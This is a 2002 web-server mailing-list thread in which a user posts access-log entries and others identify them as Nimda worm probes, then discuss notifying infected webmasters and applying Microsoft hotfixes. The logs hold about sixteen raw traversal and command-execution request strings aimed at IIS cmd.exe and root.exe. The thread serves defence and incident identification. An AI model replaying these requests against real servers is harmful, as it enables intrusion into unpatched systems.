I have simply notified the webmasters that their servers are infected with the Nimda
Virus and requested that they correct the situation.
Dave Culbertson
On 12/May/2002 00:08:16, [EMAIL PROTECTED] wrote:
> Actually I would not recommend supplying the fixes to the offender. Instead I would
>recommend they download the hotfix examiner from MS. Utilizing XML this examiner will
>evaluate all the products and required hotfixes and give them a report. There have
>been numerous hotfixes releases since Nimda first arrived for several products
>besides IIS. It would be best to plug all the holes and not just one. If anyone would
>like you can email me off list and I will send anyone asking the hotfix checker and
>the latest XML, but I would prefer you to go to MS and download them :)
>
> Danny
>
> On 11/May/2002 10:37:17, Kim A. Currier wrote:
> > If anyone needs the file, Dave, I have IIs Running, and I have the "Healing"
> > File for anyone that needs it. Just email me, it is only a few Kbytes, and
> > can be easily emailed.....
> >
> > Kim
> >
> > ----- Original Message -----
> > From: "Dave Culbertson" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Saturday, May 11, 2002 8:02 AM
> > Subject: [sambar] Access log entries {03}
> >
> >
> > > Thanks, Hank Tony and Alex. I was aware that it was no harm to Sambar and
> > since I don't run IIs, no worries here. However, I have tracked down one of
> > the offending servers and wanted to contact them with informed information.
> > That's why I needed the name of the virus on their server.
> > >
> > > Dave Culbertson
> > >
> > > On 11/May/2002 10:51:22, Tony Mallen wrote:
> > > > Nimda virus from unpatched microft servers.But its getting a 404 error
> > so should be okay.
> > > >
> > > > On 11/May/2002 04:59:49, Dave Culbertson wrote:
> > > > > Does anyone recognize what kind of virus or bot would cause the
> > following access log entries?
> > > > >
> > > > > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET
> > /MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET
> > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET
> > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET
> > /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET
> > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> > 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET
> > /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> > 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET
> > /msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe?/c+
> > dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET
> > /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET
> > /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET
> > /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET
> > /scripts/..�o../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET
> > /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET
> > /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET
> > /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET
> > /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > >
> > > > > I am being accessed by quite a few computers with the same or simular
> > entries and would like to know the name of what this is. Thanks.
> > > > >
> > > > > Dave Culbertson
> > > > >
> > > > > -------------------------------------------------------
> > > > > To unsubscribe please go to <A TARGET="_blank"
> > HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> > > > >
> > > > >
> > > > >
> > > > >
> > > > >
> > > > >
> > > >
> > > >
> > > >
> > > >
> > > >
> > > >
> > > > -------------------------------------------------------
> > > > To unsubscribe please go to <A TARGET="_blank"
> > HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> > > >
> > > >
> > > >
> > > >
> > > >
> > > >
> > > >
> > > >
> > >
> > > -------------------------------------------------------
> > > To unsubscribe please go to <A TARGET="_blank"
>HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> > >
> > >
> > >
> > >
> >
> >
> > ---
> > Outgoing mail is certified Virus Free.
> > Checked by AVG anti-virus system (<A TARGET="_blank"
>HREF="http://www.grisoft.com";>http://www.grisoft.com</A>).
> > Version: 6.0.361 / Virus Database: 199 - Release Date: 5/7/02
> >
> > -------------------------------------------------------
> > To unsubscribe please go to <A TARGET="_blank"
>HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> >
> >
> >
> >
> >
> >
>
> -------------------------------------------------------
> To unsubscribe please go to <A TARGET="_blank"
>HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
>
>
>
>
>
>
>
>
-------------------------------------------------------
To unsubscribe please go to http://www.sambar.ch/list/
